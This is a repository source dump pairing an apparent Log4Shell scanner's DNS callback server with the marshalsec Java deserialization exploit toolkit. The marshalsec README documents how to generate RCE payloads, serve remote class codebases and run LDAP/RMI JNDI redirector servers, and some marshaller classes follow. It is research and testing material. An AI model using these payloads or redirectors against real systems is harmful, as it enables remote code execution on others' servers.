├── .gitignore ├── CONTRIBUTING.md ├── README.md ├── dns └── ddnsserver.py ├── ldap ├── LICENSE.txt ├── README.md ├── marshalsec.pdf ├── pom.xml └── src │ ├── main │ └── java │ │ └── marshalsec │ │ ├── BlazeDSAMF0.java │ │ ├── BlazeDSAMF3.java │ │ ├── BlazeDSAMF3AM.java │ │ ├── BlazeDSAMFX.java │ │ ├── BlazeDSBase.java │ │ ├── BlazeDSExternalizableBase.java │ │ ├── Burlap.java │ │ ├── Castor.java │ │ ├── EscapeType.java │ │ ├── Hessian.java │ │ ├── Hessian2.java │ │ ├── HessianBase.java │ │ ├── JYAML.java │ │ ├── Jackson.java │ │ ├── Java.java │ │ ├── JsonIO.java │ │ ├── Kryo.java │ │ ├── KryoAltStrategy.java │ │ ├── MarshallerBase.java │ │ ├── Red5AMF0.java │ │ ├── Red5AMF3.java │ │ ├── Red5AMFBase.java │ │ ├── SideEffectSecurityManager.java │ │ ├── SnakeYAML.java │ │ ├── TestingSecurityManager.java │ │ ├── UtilFactory.java │ │ ├── XStream.java │ │ ├── YAMLBase.java │ │ ├── YAMLBeans.java │ │ ├── gadgets │ │ ├── Args.java │ │ ├── BindingEnumeration.java │ │ ├── C3P0RefDataSource.java │ │ ├── C3P0WrapperConnPool.java │ │ ├── ClassFiles.java │ │ ├── CommonsBeanutils.java │ │ ├── CommonsConfiguration.java │ │ ├── Gadget.java │ │ ├── GadgetType.java │ │ ├── Groovy.java │ │ ├── ImageIO.java │ │ ├── JDKUtil.java │ │ ├── JdbcRowSet.java │ │ ├── LazySearchEnumeration.java │ │ ├── MockProxies.java │ │ ├── Primary.java │ │ ├── Resin.java │ │ ├── ResourceGadget.java │ │ ├── Rome.java │ │ ├── ScriptEngine.java │ │ ├── ServiceLoader.java │ │ ├── SpringAbstractBeanFactoryPointcutAdvisor.java │ │ ├── SpringPartiallyComparableAdvisorHolder.java │ │ ├── SpringPropertyPathFactory.java │ │ ├── SpringUtil.java │ │ ├── Templates.java │ │ ├── TemplatesUtil.java │ │ ├── ToStringUtil.java │ │ ├── UnicastRefGadget.java │ │ ├── UnicastRemoteObjectGadget.java │ │ └── XBean.java │ │ ├── jndi │ │ ├── LDAPRefServer.java │ │ └── RMIRefServer.java │ │ └── util │ │ └── Reflections.java │ └── test │ └── java │ └── GadgetsTest.java └── log4-scanner ├── Dockerfile ├── FAQ.md ├── LICENSE.txt ├── README.md ├── headers-large.txt ├── headers-minimal.txt ├── headers.txt ├── log4j-scan.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | log4j-scan/ -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Welcome # 2 | 3 | We're so glad you're thinking about contributing to this open source 4 | project! If you're unsure or afraid of anything, just ask or submit 5 | the issue or pull request anyway. The worst that can happen is that 6 | you'll be politely asked to change something. We appreciate any sort 7 | of contribution, and don't want a wall of rules to get in the way of 8 | that. 9 | 10 | Before contributing, we encourage you to read our CONTRIBUTING policy 11 | (you are here), our [LICENSE](LICENSE), and our [README](README.md), 12 | all of which should be in this repository. 13 | 14 | ## Issues ## 15 | 16 | If you want to report a bug or request a new feature, the most direct 17 | method is to [create an issue](https://github.com/cisagov/log4j-scan/issues) in this 18 | repository. We recommend that you first search through existing 19 | issues (both open and closed) to check if your particular issue has 20 | already been reported. If it has then you might want to add a comment 21 | to the existing issue. If it hasn't then feel free to create a new 22 | one. 23 | 24 | ## Pull requests ## 25 | 26 | If you would like to submit a pull request, please submit it [here](https://github.com/cisagov/log4j-scan/pulls). 27 | 28 | ## Public domain ## 29 | 30 | This project is in the public domain within the United States, and 31 | copyright and related rights in the work worldwide are waived through 32 | the [CC0 1.0 Universal public domain 33 | dedication](https://creativecommons.org/publicdomain/zero/1.0/). 34 | 35 | All contributions to this project will be released under the CC0 36 | dedication. By submitting a pull request, you are agreeing to comply 37 | with this waiver of copyright interest. -------------------------------------------------------------------------------- /dns/ddnsserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | LICENSE http://www.apache.org/licenses/LICENSE-2.0 4 | """ 5 | 6 | import argparse 7 | import datetime 8 | import sys 9 | import time 10 | import threading 11 | import socketserver 12 | import struct 13 | try: 14 | from dnslib import * 15 | except ImportError: 16 | print("Missing dependency dnslib: . Please install it with `pip`.") 17 | sys.exit(2) 18 | 19 | 20 | # [+][+] Change the domain_name variable 21 | # Example: test.example.com 22 | domain_name = "test.example.com" 23 | 24 | 25 | class DomainName(str): 26 | def __getattr__(self, item): 27 | return DomainName(item + '.' + self) 28 | 29 | D = DomainName(domain_name) 30 | IP = '127.0.0.1' 31 | TTL = 60 * 5 32 | 33 | soa_record = SOA( 34 | mname=D.ns1, # primary name server 35 | rname=D.andrei, # email of the domain administrator 36 | times=( 37 | 201307231, # serial number 38 | 60 * 60 * 1, # refresh 39 | 60 * 60 * 3, # retry 40 | 60 * 60 * 24, # expire 41 | 60 * 60 * 1, # minimum 42 | ) 43 | ) 44 | ns_records = [NS(D.ns1), NS(D.ns2)] 45 | records = { 46 | D: [A(IP), AAAA((0,) * 16), MX(D.mail), soa_record] + ns_records, 47 | D.ns1: [A(IP)], # MX and NS records must never point to a CNAME alias (RFC 2181 section 10.3) 48 | D.ns2: [A(IP)], 49 | D.mail: [A(IP)], 50 | D.andrei: [CNAME(D)], 51 | } 52 | 53 | 54 | def dns_response(data): 55 | request = DNSRecord.parse(data) 56 | 57 | if request != None: 58 | for line in str(request).split('\n'): 59 | if line.find(domain_name) > 0: 60 | print(line) 61 | #print(request) 62 | 63 | reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q) 64 | 65 | qname = request.q.qname 66 | qn = str(qname) 67 | qtype = request.q.qtype 68 | qt = QTYPE[qtype] 69 | 70 | if qn == D or qn.endswith('.' + D): 71 | 72 | for name, rrs in records.items(): 73 | if name == qn: 74 | for rdata in rrs: 75 | rqt = rdata.__class__.__name__ 76 | if qt in ['*', rqt]: 77 | reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata)) 78 | 79 | for rdata in ns_records: 80 | reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata)) 81 | 82 | reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record)) 83 | 84 | #print("---- Reply:\n", reply) 85 | 86 | return reply.pack() 87 | 88 | 89 | class BaseRequestHandler(socketserver.BaseRequestHandler): 90 | 91 | def get_data(self): 92 | raise NotImplementedError 93 | 94 | def send_data(self, data): 95 | raise NotImplementedError 96 | 97 | def handle(self): 98 | now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f') 99 | #print("\n\n%s request %s (%s %s):" % (self.__class__.__name__[:3], now, self.client_address[0], 100 | # self.client_address[1])) 101 | try: 102 | data = self.get_data() 103 | #print(len(data), data) # repr(data).replace('\\x', '')[1:-1] 104 | self.send_data(dns_response(data)) 105 | except Exception: 106 | pass 107 | #traceback.print_exc(file=sys.stderr) 108 | 109 | 110 | class TCPRequestHandler(BaseRequestHandler): 111 | 112 | def get_data(self): 113 | data = self.request.recv(8192).strip() 114 | sz = struct.unpack('>H', data[:2])[0] 115 | if sz < len(data) - 2: 116 | raise Exception("Wrong size of TCP packet") 117 | elif sz > len(data) - 2: 118 | raise Exception("Too big TCP packet") 119 | return data[2:] 120 | 121 | def send_data(self, data): 122 | sz = struct.pack('>H', len(data)) 123 | return self.request.sendall(sz + data) 124 | 125 | 126 | class UDPRequestHandler(BaseRequestHandler): 127 | 128 | def get_data(self): 129 | return self.request[0].strip() 130 | 131 | def send_data(self, data): 132 | return self.request[1].sendto(data, self.client_address) 133 | 134 | 135 | def main(): 136 | parser = argparse.ArgumentParser(description='Start a DNS implemented in Python.') 137 | parser = argparse.ArgumentParser(description='Start a DNS implemented in Python. Usually DNSs use UDP on port 53.') 138 | parser.add_argument('--port', default=53, type=int, help='The port to listen on.') 139 | parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.') 140 | parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.') 141 | 142 | args = parser.parse_args() 143 | 144 | if domain_name == "test.example.com": 145 | print("\n[-] ERROR: Don't forget to change the domain_name variable :)") 146 | sys.exit(2) 147 | 148 | if not (args.udp or args.tcp): parser.error("Please select at least one of --udp or --tcp.") 149 | 150 | print("Starting nameserver...") 151 | 152 | servers = [] 153 | if args.udp: servers.append(socketserver.ThreadingUDPServer(('', args.port), UDPRequestHandler)) 154 | if args.tcp: servers.append(socketserver.ThreadingTCPServer(('', args.port), TCPRequestHandler)) 155 | 156 | for s in servers: 157 | thread = threading.Thread(target=s.serve_forever) # that thread will start one more thread for each request 158 | thread.daemon = True # exit the server thread when the main thread terminates 159 | thread.start() 160 | print("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name)) 161 | 162 | try: 163 | while 1: 164 | time.sleep(1) 165 | sys.stderr.flush() 166 | sys.stdout.flush() 167 | 168 | except KeyboardInterrupt: 169 | pass 170 | finally: 171 | for s in servers: 172 | s.shutdown() 173 | 174 | if __name__ == '__main__': 175 | main() 176 | 177 | -------------------------------------------------------------------------------- /ldap/LICENSE.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /ldap/README.md: -------------------------------------------------------------------------------- 1 | # Java Unmarshaller Security - Turning your data into code execution 2 | 3 | If you came here for Log4Shell/CVE-2021-44228, you may want to read about 4 | the exploitation vectors and affected Java runtime versions: 5 | 6 | 7 | ## Paper 8 | 9 | It's been more than two years since Chris Frohoff and Garbriel Lawrence have presented their research into Java object deserialization vulnerabilities ultimately resulting in what can be readily described as the biggest wave of remote code execution bugs in Java history. 10 | 11 | Research into that matter indicated that these vulnerabilities are not exclusive to mechanisms as expressive as Java serialization or XStream, but some could possibly be applied to other mechanisms as well. 12 | 13 | This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques. 14 | 15 | Full paper is at [marshalsec.pdf](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true) 16 | 17 | ## Disclaimer 18 | 19 | All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities. 20 | 21 | ## Usage 22 | 23 | Java 8 required. Build using maven ```mvn clean package -DskipTests```. Run as 24 | 25 | ```shell 26 | java -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] 27 | ``` 28 | 29 | where 30 | 31 | * **-a** - generates/tests all payloads for that marshaller 32 | * **-t** - runs in test mode, unmarshalling the generated payloads after generating them. 33 | * **-v** - verbose mode, e.g. also shows the generated payload in test mode. 34 | * **gadget_type** - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. 35 | * **arguments** - Gadget specific arguments 36 | 37 | Payload generators for the following marshallers are included:
38 | 39 | | Marshaller | Gadget Impact 40 | | ------------------------------- | ---------------------------------------------- 41 | | BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization
various third party libraries RCEs 42 | | Hessian|Burlap | various third party RCEs 43 | | Castor | dependency library RCE 44 | | Jackson | **possible JDK only RCE**, various third party RCEs 45 | | Java | yet another third party RCE 46 | | JsonIO | **JDK only RCE** 47 | | JYAML | **JDK only RCE** 48 | | Kryo | third party RCEs 49 | | KryoAltStrategy | **JDK only RCE** 50 | | Red5AMF(0|3) | **JDK only RCE** 51 | | SnakeYAML | **JDK only RCEs** 52 | | XStream | **JDK only RCEs** 53 | | YAMLBeans | third party RCE 54 | 55 | ## Arguments and additional prerequisites 56 | 57 | ### System Command Execution 58 | 59 | * **cmd** - command to execute 60 | * **args...** - additional parameters passed as arguments 61 | 62 | No prerequisites. 63 | 64 | ### Remote Classloading (plain) 65 | 66 | * **codebase** - URL to remote codebase 67 | * **class** - Class to load 68 | 69 | **Prerequisites**: 70 | 71 | * Set up a webserver hosting a Java classpath under some path. 72 | * Compiled class files to load need to be served according to Java classpath conventions. 73 | 74 | ### Remote Classloading (ServiceLoader) 75 | 76 | * **service_codebase** - URL to remote codebase 77 | 78 | The service to load is currently hardcoded to *javax.script.ScriptEngineFactory*. 79 | 80 | **Prerequisites**: 81 | 82 | * Same as plain remote classloading. 83 | * Also needs a provider-configuration file at **/META-INF/javax.script.ScriptEngineFactory 84 | containing the targeted class name in plain text. 85 | * Target class specified there needs to implement the service interface *javax.script.ScriptEngineFactory*. 86 | 87 | 88 | ### JNDI Reference indirection 89 | 90 | * **jndiUrl** - JNDI URL to trigger lookup on 91 | 92 | 93 | **Prerequisites**: 94 | 95 | * Set up a remote codebase, same as remote classloading. 96 | * Run a JNDI reference redirector service pointing to that codebase - 97 | two implementations are included: *marshalsec.jndi.LDAPRefServer* and *RMIRefServer*. 98 | ```shell 99 | java -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer # [] 100 | ``` 101 | * Use (ldap|rmi)://*host*:*port*/obj as the *jndiUrl*, pointing to that service's listening address. 102 | 103 | ## Running tests 104 | 105 | There are a couple of system properties that control the arguments when running tests (through maven or when using **-a**) 106 | 107 | * **exploit.codebase**, defaults to *http://localhost:8080/* 108 | * **exploit.codebaseClass**, defaults to *Exploit* 109 | * **exploit.jndiUrl**, defaults to *ldap://localhost:1389/obj* 110 | * **exploit.exec**, defaults to */usr/bin/gedit* 111 | 112 | Tests run with a SecurityManager installed that checks for system command execution as well as code executing from remote codebases. 113 | For that to work the loaded class in use must trigger some security manager check. 114 | 115 | 116 | 117 | -------------------------------------------------------------------------------- /ldap/marshalsec.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisagov/log4j-scanner/afd4d037269ca765c211f9601ead18c09efc8b62/ldap/marshalsec.pdf -------------------------------------------------------------------------------- /ldap/pom.xml: -------------------------------------------------------------------------------- 1 | 3 | 4.0.0 4 | org.eenterphace.mbechler 5 | marshalsec 6 | 0.0.3-SNAPSHOT 7 | 8 | 9 | 1.8 10 | 1.8 11 | UTF-8 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | com.sun.activation 20 | javax.activation 21 | 1.2.0 22 | 23 | 24 | 25 | org.javassist 26 | javassist 27 | 3.19.0-GA 28 | 29 | 30 | 31 | org.reflections 32 | reflections 33 | 0.9.9 34 | 35 | 36 | 37 | org.slf4j 38 | slf4j-nop 39 | 1.7.24 40 | 41 | 42 | 43 | 44 | junit 45 | junit 46 | 4.13.1 47 | test 48 | 49 | 50 | 51 | 52 | com.unboundid 53 | unboundid-ldapsdk 54 | 3.1.1 55 | 56 | 57 | 58 | 59 | 60 | 61 | org.apache.flex.blazeds 62 | flex-messaging-core 63 | 4.7.2 64 | 65 | 66 | 67 | org.red5 68 | red5-io 69 | 1.0.7-RELEASE 70 | 71 | 72 | ch.qos.logback 73 | logback-classic 74 | 75 | 76 | ch.qos.logback 77 | logback-core 78 | 79 | 80 | org.apache.mina 81 | mina-core 82 | 83 | 84 | org.apache.mina 85 | mina-integration-jmx 86 | 87 | 88 | org.apache.mina 89 | mina-integration-beans 90 | 91 | 92 | org.apache.tika 93 | tika-core 94 | 95 | 96 | org.apache.tika 97 | tika-parsers 98 | 99 | 100 | org.springframework 101 | spring-web 102 | 103 | 104 | net.sf.ehcache 105 | ehcache-core 106 | 107 | 108 | com.googlecode.mp4parser 109 | isoparser 110 | 111 | 112 | xerces 113 | xercesImpl 114 | 115 | 116 | 117 | 118 | 119 | org.apache.mina 120 | mina-core 121 | 2.1.5 122 | 123 | 124 | 125 | com.esotericsoftware 126 | kryo 127 | 4.0.0 128 | 129 | 130 | 131 | com.thoughtworks.xstream 132 | xstream 133 | 1.4.19 134 | 135 | 136 | 137 | com.fasterxml.jackson.core 138 | jackson-databind 139 | 2.13.1 140 | 141 | 142 | 143 | com.esotericsoftware.yamlbeans 144 | yamlbeans 145 | 1.09 146 | 147 | 148 | 149 | org.yaml 150 | snakeyaml 151 | 1.26 152 | 153 | 154 | 155 | org.jyaml 156 | jyaml 157 | 1.3 158 | 159 | 160 | 161 | com.cedarsoftware 162 | json-io 163 | 4.9.1 164 | 165 | 166 | 167 | com.caucho 168 | hessian 169 | 4.0.38 170 | 171 | 172 | 173 | org.codehaus.castor 174 | castor-xml 175 | 1.4.1 176 | 177 | 178 | 179 | 180 | org.codehaus.groovy 181 | groovy-all 182 | 2.4.9 183 | 184 | 185 | 186 | org.springframework 187 | spring-beans 188 | 5.3.18 189 | 190 | 191 | 192 | org.springframework 193 | spring-context 194 | 4.3.30.RELEASE 195 | 196 | 197 | 198 | org.springframework 199 | spring-aop 200 | 4.3.30.RELEASE 201 | 202 | 203 | 204 | org.aspectj 205 | aspectjweaver 206 | 1.8.6 207 | 208 | 209 | 210 | com.rometools 211 | rome 212 | 1.7.0 213 | 214 | 215 | 216 | org.apache.xbean 217 | xbean-naming 218 | 4.5 219 | 220 | 221 | 222 | com.mchange 223 | c3p0 224 | 0.9.5.4 225 | 226 | 227 | 228 | 229 | javax.json 230 | javax.json-api 231 | 1.0 232 | 233 | 234 | org.apache.johnzon 235 | johnzon-core 236 | 0.9.5 237 | 238 | 239 | 240 | 241 | com.google.inject 242 | guice 243 | 4.1.0 244 | 245 | 246 | 247 | 248 | 249 | com.caucho 250 | quercus 251 | 4.0.45 252 | 253 | 254 | 255 | 256 | commons-configuration 257 | commons-configuration 258 | 1.10 259 | 260 | 261 | 262 | 263 | org.eclipse.jetty 264 | jetty-plus 265 | 9.4.44.v20210927 266 | 267 | 268 | 269 | 270 | 271 | 272 | org.apache.maven.plugins 273 | maven-surefire-plugin 274 | 2.19.1 275 | 276 | 277 | maven-assembly-plugin 278 | 279 | ${project.artifactId}-${project.version}-all 280 | false 281 | 282 | jar-with-dependencies 283 | 284 | 285 | 286 | 287 | make-assembly 288 | package 289 | 290 | single 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/BlazeDSAMF0.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import flex.messaging.io.SerializationContext; 27 | import flex.messaging.io.amf.AbstractAmfInput; 28 | import flex.messaging.io.amf.AbstractAmfOutput; 29 | import flex.messaging.io.amf.Amf0Input; 30 | import flex.messaging.io.amf.Amf0Output; 31 | 32 | 33 | /** 34 | * @author mbechler 35 | * 36 | */ 37 | public class BlazeDSAMF0 extends BlazeDSBase { 38 | 39 | /** 40 | * {@inheritDoc} 41 | * 42 | * @see marshalsec.AbstractBlazeDSBase#createOutput(flex.messaging.io.SerializationContext) 43 | */ 44 | @Override 45 | protected AbstractAmfOutput createOutput ( SerializationContext sc ) { 46 | return new Amf0Output(sc); 47 | } 48 | 49 | 50 | /** 51 | * {@inheritDoc} 52 | * 53 | * @see marshalsec.AbstractBlazeDSBase#createInput(flex.messaging.io.SerializationContext) 54 | */ 55 | @Override 56 | protected AbstractAmfInput createInput ( SerializationContext sc ) { 57 | return new Amf0Input(sc); 58 | } 59 | 60 | 61 | public static void main ( String[] args ) { 62 | new BlazeDSAMF0().run(args); 63 | } 64 | 65 | } 66 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/BlazeDSAMF3.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import flex.messaging.io.SerializationContext; 27 | import flex.messaging.io.amf.AbstractAmfInput; 28 | import flex.messaging.io.amf.AbstractAmfOutput; 29 | import flex.messaging.io.amf.Amf3Input; 30 | import flex.messaging.io.amf.Amf3Output; 31 | 32 | 33 | /** 34 | * @author mbechler 35 | * 36 | */ 37 | public class BlazeDSAMF3 extends BlazeDSExternalizableBase { 38 | 39 | /** 40 | * {@inheritDoc} 41 | * 42 | * @see marshalsec.AbstractBlazeDSBase#createOutput(flex.messaging.io.SerializationContext) 43 | */ 44 | @Override 45 | protected AbstractAmfOutput createOutput ( SerializationContext sc ) { 46 | return new Amf3Output(sc); 47 | } 48 | 49 | 50 | /** 51 | * {@inheritDoc} 52 | * 53 | * @see marshalsec.AbstractBlazeDSBase#createInput(flex.messaging.io.SerializationContext) 54 | */ 55 | @Override 56 | protected AbstractAmfInput createInput ( SerializationContext sc ) { 57 | return new Amf3Input(sc); 58 | } 59 | 60 | 61 | public static void main ( String[] args ) { 62 | new BlazeDSAMF3().run(args); 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/BlazeDSAMF3AM.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | 29 | import flex.messaging.io.MessageIOConstants; 30 | import flex.messaging.io.SerializationContext; 31 | import flex.messaging.io.amf.ActionContext; 32 | import flex.messaging.io.amf.ActionMessage; 33 | import flex.messaging.io.amf.AmfMessageDeserializer; 34 | import flex.messaging.io.amf.AmfMessageSerializer; 35 | import flex.messaging.io.amf.AmfTrace; 36 | import flex.messaging.io.amf.MessageHeader; 37 | 38 | 39 | /** 40 | * AMF3 serialization, payload wrapped in ActionMessage 41 | * 42 | * @author mbechler 43 | * 44 | */ 45 | public class BlazeDSAMF3AM extends BlazeDSAMF3 { 46 | 47 | /** 48 | * {@inheritDoc} 49 | * 50 | * @see marshalsec.BlazeDSBase#marshal(java.lang.Object) 51 | */ 52 | @Override 53 | public byte[] marshal ( Object o ) throws Exception { 54 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 55 | SerializationContext sc = new SerializationContext(); 56 | AmfMessageSerializer serializer = new AmfMessageSerializer(); 57 | serializer.initialize(sc, bos, new AmfTrace()); 58 | ActionMessage am = new ActionMessage(MessageIOConstants.AMF3); 59 | am.addHeader(new MessageHeader("payl", false, o)); 60 | serializer.writeMessage(am); 61 | return bos.toByteArray(); 62 | } 63 | 64 | 65 | /** 66 | * {@inheritDoc} 67 | * 68 | * @see marshalsec.BlazeDSBase#unmarshal(byte[]) 69 | */ 70 | @Override 71 | public Object unmarshal ( byte[] data ) throws Exception { 72 | SerializationContext sc = new SerializationContext(); 73 | AmfMessageDeserializer deserializer = new AmfMessageDeserializer(); 74 | deserializer.initialize(sc, new ByteArrayInputStream(data), new AmfTrace()); 75 | ActionMessage am = new ActionMessage(MessageIOConstants.AMF3); 76 | ActionContext ac = new ActionContext(); 77 | deserializer.readMessage(am, ac); 78 | return am.getHeader(0); 79 | } 80 | 81 | 82 | public static void main ( String[] args ) { 83 | new BlazeDSAMF3AM().run(args); 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/BlazeDSAMFX.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | 29 | import flex.messaging.io.SerializationContext; 30 | import flex.messaging.io.amf.AbstractAmfInput; 31 | import flex.messaging.io.amf.AbstractAmfOutput; 32 | import flex.messaging.io.amf.ActionMessage; 33 | import flex.messaging.io.amf.MessageHeader; 34 | import flex.messaging.io.amfx.AmfxMessageDeserializer; 35 | import flex.messaging.io.amfx.AmfxMessageSerializer; 36 | 37 | 38 | /** 39 | * @author mbechler 40 | * 41 | */ 42 | public class BlazeDSAMFX extends BlazeDSExternalizableBase { 43 | 44 | /** 45 | * {@inheritDoc} 46 | * 47 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 48 | */ 49 | @Override 50 | public byte[] marshal ( Object o ) throws Exception { 51 | SerializationContext sc = new SerializationContext(); 52 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 53 | AmfxMessageSerializer out = new AmfxMessageSerializer(); 54 | out.initialize(sc, bos, null); 55 | ActionMessage m = new ActionMessage(); 56 | m.addHeader(new MessageHeader("foo", false, o)); 57 | out.writeMessage(m); 58 | return bos.toByteArray(); 59 